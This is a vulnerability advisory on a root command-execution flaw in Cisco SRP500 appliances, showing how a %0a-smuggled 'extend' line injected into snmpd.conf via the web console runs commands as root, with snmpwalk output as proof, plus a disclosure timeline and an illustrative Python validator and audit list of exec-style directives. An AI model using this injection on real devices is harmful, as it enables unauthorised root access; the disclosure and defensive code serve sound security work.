
Cisco SRP500 OS ROOT

About Cisco SRP500 Series

Cisco SRP 500 is a small business pro appliance which offers features such as (information from cisco.com): "Integrated security, VPN capabilities, and an 802.11n wireless access point", "(SIP) stack to deliver clear, high-quality voice service" or "Intelligence to support voice, data, security, and application services".

The appliance is managed via a web management console.

The vulnerabilities were tested on a Cisco SRP527W (firmware V1.01.19); Cisco confirmed that all firmware versions prior to 1.1.24 are affected.

[Image: Cisco SRP500 series appliance; image copyright Cisco.com]

Details

SNMPD configuration file injection.

Due to a lack of proper input validation in the web interface, one can inject a line into snmpd.conf, allowing OS command execution as root.

Steps:

  • Logging into the web management console
  • Injecting the "extend ps /bin/ps" line using %0a and the following HTTP request:

[Image: the HTTP request used for the injection]

  • Querying the device using snmpwalk:
$ snmpwalk -v 1 -c public 192.168.15.1 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."ps" = STRING:   PID USER       VSZ STAT COMMAND
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."ps" = STRING:   PID USER       VSZ STAT COMMAND
    1 admin     4472 S    /sbin/init
    2 admin        0 SW<  [kthreadd]
    3 admin        0 SWN  [ksoftirqd/0]
    4 admin        0 SW<  [events/0]
    5 admin        0 SW<  [khelper]
   39 admin        0 SW<  [kblockd/0]
   53 admin        0 SW   [crypto]
   54 admin        0 SW   [crypto_ret]
   59 admin        0 SW   [pdflush]
   60 admin        0 SW   [pdflush]
   61 admin        0 SW<  [kswapd0]
   62 admin        0 SW<  [aio/0]
  183 admin        0 SW<  [mtdblockd]
  184 admin        0 SW<  [nftld]
  280 admin     4160 S    /sbin/init
  282 admin     3464 S    router_provisioning
  283 admin     2440 S    ledapp &
  346 admin     1888 S    hotplug_3g
  347 admin     3532 S    usb_3g
  358 admin        0 SW<  [khubd]
  437 admin        0 SWN  [jffs2_gcd_mtd8]
  440 admin        0 SWN  [jffs2_gcd_mtd3]
  477 admin        0 SW<  [loop0]
  478 admin        0 SWN  [jffs2_gcd_mtd4]
  479 admin        0 SWN  [jffs2_gcd_mtd6]
  551 admin     1552 S    syslogd -L -s 20 -b 1
  553 admin     1552 S    klogd
  555 admin     2504 S    cpu_load
  556 admin     1980 S    sh -c mpstat 2
  557 admin     1628 S    mpstat 2
  560 admin     3172 S    tftpd -a 192.168.15.1 -s /tmp -c -l
  561 admin     1704 S    cron
  579 admin     4500 S    httpd
  583 admin     1760 S    dnsmasq -C /tmp/dnsmasq.conf -r /tmp/dns_resolv.conf
  599 admin     3784 S    upnpd br0
  609 admin     2068 S    dropbear -d /etc/dropbear_dss_host_key -r /etc/dropbe
  610 admin    18096 S    cdpd
  614 admin     3060 S    cmd_server
  692 admin     1980 S    /bin/sh /etc/start_voice
  700 admin     1552 S    /usr/sbin/udhcpd /tmp/udhcpd_0.conf
  706 admin     1552 S    /usr/sbin/udhcpd /tmp/udhcpd_1.conf
  728 admin    23144 S    /sbin/spr_voip
  913 admin     6308 R    snmpd -c /tmp/snmpd.conf
 1503 admin     1984 R    /bin/ps 0.0.0.0/0.0.0.0
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."ps" = INTEGER: 45
NET-SNMP-EXTEND-MIB::nsExtendResult."ps" = INTEGER: 0
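As an added illustration (not code from the advisory or from Cisco), the pattern behind this bug: a web form value written into snmpd.conf unchanged, so a decoded %0a turns one directive into two, shown beside a hardened writer that rejects control characters and an audit function that flags program-executing directives in a generated snmpd.conf. The syslocation field, the rocommunity line and the sample value are assumptions; the advisory does not name which web field was injected.

```python
import re

# Net-SNMP directives that make snmpd run a program. Since snmpd on the
# SRP500 runs as root, any injected line of this kind is a root shell.
EXEC_DIRECTIVES = ("extend", "extendfix", "exec", "sh", "pass", "pass_persist")

def render_snmpd_conf_unsafe(community, location):
    """Vulnerable pattern (assumed layout): values are written as-is, so a
    value containing a newline becomes an extra directive on its own line."""
    return f"rocommunity {community}\nsyslocation {location}\n"

def is_safe_value(value):
    """True if the value contains no CR/LF or other control characters."""
    return re.search(r"[\x00-\x1f\x7f]", value) is None

def render_snmpd_conf_safe(community, location):
    """Hardened pattern: refuse values that could break out of their line."""
    for value in (community, location):
        if not is_safe_value(value):
            raise ValueError("control character in configuration value")
    return f"rocommunity {community}\nsyslocation {location}\n"

def find_exec_directives(conf_text):
    """Audit helper: return every non-comment line whose keyword tells snmpd
    to execute a program (what a legitimate SRP500 config should never have)."""
    hits = []
    for line in conf_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.split()[0].lower() in EXEC_DIRECTIVES:
            hits.append(stripped)
    return hits

# Constructed sample: a location value carrying the newline that %0a in the
# advisory's request decodes to, followed by the directive from the advisory.
CONSTRUCTED_LOCATION = "office\nextend ps /bin/ps"

if __name__ == "__main__":
    conf = render_snmpd_conf_unsafe("public", CONSTRUCTED_LOCATION)
    print(find_exec_directives(conf))            # ['extend ps /bin/ps']
    print(is_safe_value(CONSTRUCTED_LOCATION))  # False
```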

Vendor's reaction / issue history

  • 12.07.2011 - full disclosure sent to the vendor
  • 16.09.2011 - initial, internal fix issued by the vendor
  • 02.11.2011 - patch issued by the vendor, Cisco public announcement
  • 25.11.2011 - public disclosure by Securitum

Thanks to Gaweł Mikołajczyk for providing test hardware.

Research / contact

  • We are performing research on web management interfaces of network appliances. If you want to help, feel free to contact us at devices_hacking@securitum.pl

Disclaimer

  • All the information is provided for educational use only.
  • We strongly discourage using this information for cracking / illegal purposes.
  • We are not responsible for damage done to your router - play with your router carefully.


Michal Sajdak
michal.sajdak@securitum.pl
